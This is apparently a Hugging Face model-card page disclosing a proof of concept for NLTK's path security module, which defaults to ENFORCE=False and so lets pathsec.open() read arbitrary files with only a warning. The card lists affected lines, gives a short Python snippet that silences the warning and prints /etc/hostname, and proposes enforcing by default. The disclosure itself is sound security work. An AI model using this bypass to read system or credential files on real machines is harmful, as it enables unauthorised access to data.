Hugging Face's logo

ryansecuritytest-fanpierlabs
/
poc-nltk-pathsec-bypass

nltk
Model card Files
xet
 Community

NLTK pathsec ENFORCE=False Bypass PoC

Vulnerability

NLTK's path security module defaults to ENFORCE=False, making pathsec.open() read arbitrary files with only a warning.

Affected Code

  • nltk/pathsec.py:24 โ€” ENFORCE = False
  • nltk/pathsec.py:253-256 โ€” open() proceeds after warning

Reproduction 

import warnings, nltk.pathsec as pathsec
with warnings.catch_warnings(record=True):
    warnings.simplefilter("always")
    f = pathsec.open("/etc/hostname", "r")
    print(f.read())  # Reads file despite security warning!

Fix

Set ENFORCE = True by default.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support